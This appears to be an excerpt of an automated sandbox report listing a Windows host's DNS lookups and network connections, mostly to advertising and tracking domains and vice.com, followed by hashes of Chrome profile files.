| US | 8.8.8.8:53 | sync-t1.taboola.com | udp |
| NL | 213.19.162.90:443 | pixel.rubiconproject.com | tcp |
| DE | 37.252.172.123:443 | secure.adnxs.com | tcp |
| JP | 35.213.12.39:443 | x.bidswitch.net | tcp |
| NL | 173.223.112.20:443 | contextual.media.net | tcp |
| FR | 185.86.138.154:443 | rtb-csync.smartadserver.com | tcp |
| SG | 52.76.224.60:443 | match.sharethrough.com | tcp |
| SG | 141.226.229.48:443 | sync-t1.taboola.com | tcp |
| US | 8.8.8.8:53 | criteo-sync.teads.tv | udp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | adgen.socdm.com | udp |
| US | 8.8.8.8:53 | tg.socdm.com | udp |
| NL | 173.223.113.34:443 | criteo-sync.teads.tv | tcp |
| US | 8.8.8.8:53 | r.casalemedia.com | udp |
| US | 8.8.8.8:53 | adx.dable.io | udp |
| DE | 3.75.62.37:443 | ups.analytics.yahoo.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| JP | 124.146.215.49:443 | tg.socdm.com | tcp |
| US | 8.8.8.8:53 | cs.adingo.jp | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| KR | 52.78.158.104:443 | adx.dable.io | tcp |
| CA | 185.80.39.216:443 | r.casalemedia.com | tcp |
| JP | 124.146.153.150:443 | adgen.socdm.com | tcp |
| US | 8.8.8.8:53 | ads.stickyadstv.com | udp |
| SG | 182.161.73.146:443 | dis.criteo.com | tcp |
| JP | 54.64.172.71:443 | cs.adingo.jp | tcp |
| US | 8.8.8.8:53 | ad.360yield.com | udp |
| NL | 23.72.252.152:443 | ads.stickyadstv.com | tcp |
| SG | 52.77.86.135:443 | ad.360yield.com | tcp |
| SG | 182.161.73.146:443 | dis.criteo.com | tcp |
| US | 8.8.8.8:53 | ocsp.r2m01.amazontrust.com | udp |
| US | 8.8.8.8:53 | idsync.rlcdn.com | udp |
| US | 8.8.8.8:53 | exchange.mediavine.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | sync.outbrain.com | udp |
| US | 8.8.8.8:53 | simage2.pubmatic.com | udp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| US | 8.8.8.8:53 | ade.clmbtech.com | udp |
| US | 8.8.8.8:53 | sync.aralego.com | udp |
| US | 8.8.8.8:53 | sync-criteo.ads.yieldmo.com | udp |
| US | 204.79.197.200:443 | c.bing.com | tcp |
| US | 35.190.60.146:443 | idsync.rlcdn.com | tcp |
| SG | 103.231.98.194:443 | simage2.pubmatic.com | tcp |
| DE | 3.68.171.222:443 | exchange.mediavine.com | tcp |
| US | 13.225.16.178:80 | ocsp.r2m01.amazontrust.com | tcp |
| US | 50.31.142.31:443 | sync.outbrain.com | tcp |
| NL | 95.101.74.150:443 | ade.clmbtech.com | tcp |
| DE | 13.32.27.67:443 | s.ad.smaato.net | tcp |
| SG | 23.108.98.2:443 | sync.aralego.com | tcp |
| SG | 54.169.120.86:443 | sync-criteo.ads.yieldmo.com | tcp |
| US | 8.8.8.8:53 | 150.119.119.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.162.19.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.172.252.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.112.223.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.138.86.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.113.223.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.111.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.62.75.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.39.80.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.224.76.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.12.213.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.226.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.60.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.171.68.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.16.225.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.27.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.215.146.124.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.158.78.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.153.146.124.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.73.161.182.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.142.31.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ocsp.r2m02.amazontrust.com | udp |
| US | 13.225.16.178:80 | ocsp.r2m02.amazontrust.com | tcp |
| US | 8.8.8.8:53 | 71.172.64.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.86.77.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.120.169.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.98.108.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.98.231.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.137.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| NL | 142.250.179.182:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 174.179.250.142.in-addr.arpa | udp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | lens.google.com | udp |
| NL | 142.250.179.194:443 | cm.g.doubleclick.net | udp |
| NL | 142.250.179.198:443 | static.doubleclick.net | udp |
| NL | 142.250.179.170:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| DE | 74.120.188.204:443 | static.wikia.nocookie.net | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| US | 8.8.8.8:53 | 200.232.18.117.in-addr.arpa | udp |
| US | 8.8.8.8:53 | csm.va.us.criteo.net | udp |
| US | 74.119.119.149:443 | csm.va.us.criteo.net | tcp |
| US | 74.119.119.149:443 | csm.va.us.criteo.net | tcp |
| US | 8.8.8.8:53 | 149.119.119.74.in-addr.arpa | udp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | 58.250.217.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 2.16.241.157:443 | www.bing.com | tcp |
| DE | 2.16.241.157:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 131.113.223.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.241.16.2.in-addr.arpa | udp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| US | 8.8.8.8:53 | motherboard.vice.com | udp |
| US | 151.101.1.132:80 | motherboard.vice.com | tcp |
| US | 151.101.1.132:80 | motherboard.vice.com | tcp |
| US | 151.101.1.132:443 | motherboard.vice.com | tcp |
| US | 8.8.8.8:53 | www.vice.com | udp |
| US | 151.101.1.132:443 | www.vice.com | tcp |
| US | 151.101.1.132:443 | www.vice.com | tcp |
| US | 8.8.8.8:53 | 132.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | oembed.vice.com | udp |
| US | 151.101.1.132:443 | oembed.vice.com | tcp |
| US | 151.101.1.132:443 | oembed.vice.com | tcp |
| US | 8.8.8.8:53 | video-images.vice.com | udp |
| US | 8.8.8.8:53 | vice-web-statics-cdn.vice.com | udp |
| US | 8.8.8.8:53 | tags.remixd.com | udp |
| US | 151.101.1.132:443 | vice-web-statics-cdn.vice.com | tcp |
| US | 151.101.1.132:443 | vice-web-statics-cdn.vice.com | tcp |
| BE | 13.225.239.59:443 | tags.remixd.com | tcp |
| BE | 13.225.239.59:443 | tags.remixd.com | tcp |
| US | 151.101.1.132:443 | vice-web-statics-cdn.vice.com | tcp |
| US | 151.101.1.132:443 | vice-web-statics-cdn.vice.com | tcp |
| US | 8.8.8.8:53 | cdn.segment.com | udp |
| US | 8.8.8.8:53 | www.npttech.com | udp |
| NL | 13.227.222.191:443 | cdn.segment.com | tcp |
| NL | 13.227.222.191:443 | cdn.segment.com | tcp |
| US | 8.8.8.8:53 | 59.239.225.13.in-addr.arpa | udp |
| US | 172.64.143.38:443 | www.npttech.com | tcp |
| US | 172.64.143.38:443 | www.npttech.com | tcp |
| US | 151.101.1.132:443 | vice-web-statics-cdn.vice.com | tcp |
| US | 151.101.1.132:443 | vice-web-statics-cdn.vice.com | tcp |
| US | 8.8.8.8:53 | 191.222.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.143.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vmg-useast.gscontxt.net | udp |
| US | 129.159.113.125:443 | vmg-useast.gscontxt.net | tcp |
| US | 129.159.113.125:443 | vmg-useast.gscontxt.net | tcp |
| US | 8.8.8.8:53 | gdpr-tcfv2.sp-prod.net | udp |
| NL | 13.227.219.52:443 | gdpr-tcfv2.sp-prod.net | tcp |
| NL | 13.227.219.52:443 | gdpr-tcfv2.sp-prod.net | tcp |
| US | 8.8.8.8:53 | ccpa.sp-prod.net | udp |
| DE | 18.66.112.27:443 | ccpa.sp-prod.net | tcp |
| DE | 18.66.112.27:443 | ccpa.sp-prod.net | tcp |
| US | 8.8.8.8:53 | widgets.outbrain.com | udp |
| DE | 23.218.209.87:443 | widgets.outbrain.com | tcp |
| DE | 23.218.209.87:443 | widgets.outbrain.com | tcp |
| US | 8.8.8.8:53 | 52.219.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.113.159.129.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.112.66.18.in-addr.arpa | udp |
| US | 151.101.1.132:443 | vice-web-statics-cdn.vice.com | tcp |
| US | 151.101.1.132:443 | vice-web-statics-cdn.vice.com | tcp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 172.67.70.134:443 | btloader.com | tcp |
| US | 172.67.70.134:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | sourcepoint.vice.com | udp |
| US | 8.8.8.8:53 | cdn.confiant-integrations.net | udp |
| NL | 52.222.139.41:443 | sourcepoint.vice.com | tcp |
| NL | 52.222.139.41:443 | sourcepoint.vice.com | tcp |
| US | 8.8.8.8:53 | z.moatads.com | udp |
| US | 104.18.34.10:443 | cdn.confiant-integrations.net | tcp |
| US | 104.18.34.10:443 | cdn.confiant-integrations.net | tcp |
| NL | 172.217.168.194:443 | securepubads.g.doubleclick.net | tcp |
| NL | 172.217.168.194:443 | securepubads.g.doubleclick.net | tcp |
| DE | 23.218.209.154:443 | z.moatads.com | tcp |
| DE | 23.218.209.154:443 | z.moatads.com | tcp |
| US | 8.8.8.8:53 | experience.tinypass.com | udp |
| US | 104.17.185.177:443 | experience.tinypass.com | tcp |
| US | 104.17.185.177:443 | experience.tinypass.com | tcp |
| US | 8.8.8.8:53 | d2zue0pgsssbc6.cloudfront.net | udp |
| NL | 52.222.137.76:443 | d2zue0pgsssbc6.cloudfront.net | tcp |
| NL | 52.222.137.76:443 | d2zue0pgsssbc6.cloudfront.net | tcp |
| US | 8.8.8.8:53 | htlbid.com | udp |
| NL | 13.227.219.113:443 | htlbid.com | tcp |
| NL | 13.227.219.113:443 | htlbid.com | tcp |
| US | 8.8.8.8:53 | 134.70.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.34.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.209.218.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.185.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.137.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.219.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | widget-pixels.outbrain.com | udp |
| DE | 23.218.209.87:443 | widget-pixels.outbrain.com | tcp |
| DE | 23.218.209.87:443 | widget-pixels.outbrain.com | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | ocsp.r2m01.amazontrust.com | udp |
| US | 54.230.54.45:80 | ocsp.r2m01.amazontrust.com | tcp |
| US | 8.8.8.8:53 | cdn.privacy-mgmt.com | udp |
| DE | 18.155.145.18:443 | cdn.privacy-mgmt.com | tcp |
| DE | 18.155.145.18:443 | cdn.privacy-mgmt.com | tcp |
| US | 8.8.8.8:53 | 70.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.54.230.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.145.155.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.tinypass.com | udp |
| US | 104.17.182.177:443 | cdn.tinypass.com | tcp |
| US | 104.17.182.177:443 | cdn.tinypass.com | tcp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 8.8.8.8:53 | ccpa-service.sp-prod.net | udp |
| US | 18.210.236.91:443 | ccpa-service.sp-prod.net | tcp |
| US | 18.210.236.91:443 | ccpa-service.sp-prod.net | tcp |
| US | 8.8.8.8:53 | cdn.cxense.com | udp |
| NL | 23.222.46.90:443 | cdn.cxense.com | tcp |
| NL | 23.222.46.90:443 | cdn.cxense.com | tcp |
| US | 8.8.8.8:53 | 177.182.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.236.210.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.46.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c2.piano.io | udp |
| US | 104.16.240.21:443 | c2.piano.io | tcp |
| US | 104.16.240.21:443 | c2.piano.io | tcp |
| US | 8.8.8.8:53 | pubcast-files.remixd.com | udp |
| US | 35.190.38.143:443 | pubcast-files.remixd.com | tcp |
| US | 35.190.38.143:443 | pubcast-files.remixd.com | tcp |
| US | 8.8.8.8:53 | 21.240.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.38.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 157.240.5.10:443 | connect.facebook.net | tcp |
| US | 157.240.5.10:443 | connect.facebook.net | tcp |
| US | 8.8.8.8:53 | static.ads-twitter.com | udp |
| NL | 199.232.148.157:443 | static.ads-twitter.com | tcp |
| NL | 199.232.148.157:443 | static.ads-twitter.com | tcp |
| US | 8.8.8.8:53 | analytics.tiktok.com | udp |
| NL | 95.101.74.138:443 | analytics.tiktok.com | tcp |
| NL | 95.101.74.138:443 | analytics.tiktok.com | tcp |
| US | 8.8.8.8:53 | 10.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.148.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mb.moatads.com | udp |
| IE | 52.48.233.13:443 | mb.moatads.com | tcp |
| IE | 52.48.233.13:443 | mb.moatads.com | tcp |
| US | 8.8.8.8:53 | 13.233.48.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ak.sail-horizon.com | udp |
| NL | 52.222.139.77:443 | ak.sail-horizon.com | tcp |
| NL | 52.222.139.77:443 | ak.sail-horizon.com | tcp |
| BE | 13.225.239.17:443 | sdk.snapkit.com | tcp |
| BE | 13.225.239.17:443 | sdk.snapkit.com | tcp |
| US | 8.8.8.8:53 | 77.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.239.225.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tag.aticdn.net | udp |
| NL | 52.222.139.33:443 | tag.aticdn.net | tcp |
| NL | 52.222.139.33:443 | tag.aticdn.net | tcp |
| US | 8.8.8.8:53 | sc-static.net | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| NL | 54.192.87.248:443 | sc-static.net | tcp |
| NL | 54.192.87.248:443 | sc-static.net | tcp |
| DE | 108.138.7.10:443 | sb.scorecardresearch.com | tcp |
| DE | 108.138.7.10:443 | sb.scorecardresearch.com | tcp |
| US | 8.8.8.8:53 | static.chartbeat.com | udp |
| US | 8.8.8.8:53 | tag.durationmedia.net | udp |
| NL | 13.227.216.166:443 | static.chartbeat.com | tcp |
| NL | 13.227.216.166:443 | static.chartbeat.com | tcp |
| US | 8.8.8.8:53 | s.skimresources.com | udp |
| NL | 52.222.139.76:443 | tag.durationmedia.net | tcp |
| NL | 52.222.139.76:443 | tag.durationmedia.net | tcp |
| US | 8.8.8.8:53 | cdn-magiclinks.trackonomics.net | udp |
| US | 151.139.128.10:443 | s.skimresources.com | tcp |
| US | 151.139.128.10:443 | s.skimresources.com | tcp |
| NL | 52.222.139.79:443 | cdn-magiclinks.trackonomics.net | tcp |
| NL | 52.222.139.79:443 | cdn-magiclinks.trackonomics.net | tcp |
| US | 8.8.8.8:53 | 33.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.87.192.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.7.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.216.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.128.139.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 104.244.42.133:443 | t.co | tcp |
| US | 104.244.42.133:443 | t.co | tcp |
| US | 8.8.8.8:53 | analytics.twitter.com | udp |
| US | 104.244.42.131:443 | analytics.twitter.com | tcp |
| US | 104.244.42.131:443 | analytics.twitter.com | tcp |
| US | 104.244.42.133:443 | t.co | tcp |
| US | 104.244.42.131:443 | analytics.twitter.com | tcp |
| US | 104.244.42.133:443 | t.co | tcp |
| US | 8.8.8.8:53 | 133.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.42.244.104.in-addr.arpa | udp |
| US | 104.244.42.131:443 | analytics.twitter.com | tcp |
| US | 8.8.8.8:53 | api.sail-personalize.com | udp |
| US | 75.2.40.13:443 | api.sail-personalize.com | tcp |
| US | 75.2.40.13:443 | api.sail-personalize.com | tcp |
| US | 8.8.8.8:53 | api.snapkit.com | udp |
| US | 35.190.43.134:443 | api.snapkit.com | tcp |
| US | 35.190.43.134:443 | api.snapkit.com | tcp |
| US | 8.8.8.8:53 | tr.snapchat.com | udp |
| US | 35.190.43.134:443 | tr.snapchat.com | tcp |
| US | 35.190.43.134:443 | tr.snapchat.com | tcp |
| US | 35.190.43.134:443 | tr.snapchat.com | tcp |
| US | 8.8.8.8:53 | ping.chartbeat.net | udp |
| US | 34.230.229.95:443 | ping.chartbeat.net | tcp |
| US | 34.230.229.95:443 | ping.chartbeat.net | tcp |
| US | 8.8.8.8:53 | 134.43.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.40.2.75.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.229.230.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.38.195.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 157.240.5.35:443 | www.facebook.com | tcp |
| US | 157.240.5.35:443 | www.facebook.com | tcp |
| US | 157.240.5.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 35.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.jwplayer.com | udp |
| NL | 52.222.139.53:443 | cdn.jwplayer.com | tcp |
| NL | 52.222.139.53:443 | cdn.jwplayer.com | tcp |
| US | 8.8.8.8:53 | t.skimresources.com | udp |
| US | 35.201.67.47:443 | t.skimresources.com | tcp |
| US | 35.201.67.47:443 | t.skimresources.com | tcp |
| US | 8.8.8.8:53 | p.skimresources.com | udp |
| US | 35.190.91.160:443 | p.skimresources.com | tcp |
| US | 35.190.91.160:443 | p.skimresources.com | tcp |
| US | 8.8.8.8:53 | 53.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.67.201.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.91.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geo.moatads.com | udp |
| SG | 13.228.198.14:443 | geo.moatads.com | tcp |
| SG | 13.228.198.14:443 | geo.moatads.com | tcp |
| US | 8.8.8.8:53 | px.moatads.com | udp |
| DE | 23.218.209.154:443 | px.moatads.com | tcp |
| DE | 23.218.209.154:443 | px.moatads.com | tcp |
| US | 8.8.8.8:53 | player-files.remixd.com | udp |
| US | 35.190.38.143:443 | player-files.remixd.com | tcp |
| US | 35.190.38.143:443 | player-files.remixd.com | tcp |
| US | 35.190.38.143:443 | player-files.remixd.com | tcp |
| US | 8.8.8.8:53 | 14.198.228.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| NL | 142.250.102.156:443 | stats.g.doubleclick.net | tcp |
| NL | 142.250.102.156:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pixel.tapad.com | udp |
| US | 8.8.8.8:53 | mv.outbrain.com | udp |
| US | 34.111.113.62:443 | pixel.tapad.com | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | tcp |
| NL | 199.232.150.132:443 | mv.outbrain.com | tcp |
| NL | 199.232.150.132:443 | mv.outbrain.com | tcp |
| US | 8.8.8.8:53 | p1cluster.cxense.com | udp |
| NL | 147.75.83.64:443 | p1cluster.cxense.com | tcp |
| NL | 147.75.83.64:443 | p1cluster.cxense.com | tcp |
| US | 8.8.8.8:53 | 62.113.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.150.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.83.75.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | buy.tinypass.com | udp |
| US | 104.17.183.177:443 | buy.tinypass.com | tcp |
| US | 104.17.183.177:443 | buy.tinypass.com | tcp |
| US | 8.8.8.8:53 | 177.183.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mcdp-nydc1.outbrain.com | udp |
| US | 70.42.32.31:443 | mcdp-nydc1.outbrain.com | tcp |
| US | 70.42.32.31:443 | mcdp-nydc1.outbrain.com | tcp |
| US | 8.8.8.8:53 | 31.32.42.70.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 7c48dd2f4e33b67ffa3236b9ea4aaff2 |
| SHA1 | f66927a44e7de0c0038ce744d1d1d7251742702a |
| SHA256 | b496c6028f1d5fe18f50705c8108ae84820748a3a2286cc9b56d2bb5a38aab02 |
| SHA512 | 6ccba975ea123b1f59ddda5ec486be685df0ca1def0d34ccd160047a3fc9b126ec58092ed3f98b0cd6cf9df53a95083ddd979ed311d06fcc70eda216501dfa50 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\492fe318-9ecd-4dbf-be22-73a5a4eeedb0.dmp
| MD5 | 1cc2173b8bdbda19a3cce84057ac6e23 |
| SHA1 | 8536924f7e6766bd0fba517bb438085dcbd9bdcf |
| SHA256 | 35faa1fa0ccc1be231fc92a4f7b1d734d9af588d89d6f97c50dc3c06a6cc8723 |
| SHA512 | 6e8125c4a69d9d9574c9887ced252b922c620cfc36a3b485896794ef7958acedaee0c4c762ae167248d19d3dc95764450eaf9c926c58a0727269b27a4531f225 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
| MD5 | d240b4c36ae1ee60440a0eca5f00b7ec |
| SHA1 | b1882537b11988d52ea1243214984b60f9d92e75 |
| SHA256 | 9ae700f07c5cb75eeab5af151aa87fd79f121e08a23532a2996e75a54a3cf2db |
| SHA512 | 76340ace1381d9ea423be691f8090b12f08ac02426b1880ff9eef122fedfd25c13924de04166bcf3d0651aa2d87b5cb9062fd60659ab729cfddc0cac7cf32420 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations
| MD5 | f732dbed9289177d15e236d0f8f2ddd3 |
| SHA1 | 53f822af51b014bc3d4b575865d9c3ef0e4debde |
| SHA256 | 2741df9ee9e9d9883397078f94480e9bc1d9c76996eec5cfe4e77929337cbe93 |
| SHA512 | b64e5021f32e26c752fcba15a139815894309b25644e74ceca46a9aa97070bca3b77ded569a9bfd694193d035ba75b61a8d6262c8e6d5c4d76b452b38f5150a4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
| MD5 | 9eae63c7a967fc314dd311d9f46a45b7 |
| SHA1 | caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf |
| SHA256 | 4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d |
| SHA512 | bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | 6ead189534806177c1dd4d5c9b8e3e16 |
| SHA1 | 2adfa91ad9829f1f45f7fc8be7b6a12151ad972b |
| SHA256 | 5536f51f9a4718c1b19521e2f86b8b8417f4bd9949928c2fa42168b51c1900bb |
| SHA512 | 62ebcd86895f1d3fa0c98a8505f7523afe3d03e7eaff4f936c3199cf5ba4d6379802d76b688438515664b91aa66a570f3365b8d200717f7573677db4899284a3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
| MD5 | 7470b8e02105aec32da04baa73d64b0d |
| SHA1 | 11b4e400095c81f4ad2d37cfad6d530c90649e3d |
| SHA256 | 3d519562d3af6661b3a5cbba55888068b84c758b74713572357b4f210a783ad7 |
| SHA512 | f066c395146b294bb851f7340cc4a63901c413b913d40334bb5a7baccb569c298c821f9e5bdacbd06bad2070ce5979f4a69973c560f51e127800f16273723507 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
| MD5 | ba9b070da9d7e361f78edae71074edf5 |
| SHA1 | c0174cd4e51191b038586a8972099190f4c13624 |
| SHA256 | b0235ac4cccde03f4e2fe82d38f87c48912529af4189ef729e436dc20c72d0f0 |
| SHA512 | 71d87aa63b1824d692a54679d8c2f637a9b8b44dc77c17dee5f839ebd889f7d845b28f0bb65479bf675c016dc830ffedf5e254c67d9e2a502e48b4ef23abcb87 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log
| MD5 | fa1af62bdaf3c63591454d2631d5dd6d |
| SHA1 | 14fc1fc51a9b7ccab8f04c45d84442ed02eb9466 |
| SHA256 | 00dd3c8077c2cca17ea9b94804490326ae6f43e6070d06b1516dfd5c4736d94d |
| SHA512 | 2c3184f563b9a9bff088114f0547f204ee1e0b864115366c86506215f42d7dbf161bc2534ccaee783e62cc01105edffc5f5dabf229da5ebd839c96af1d45de77 |
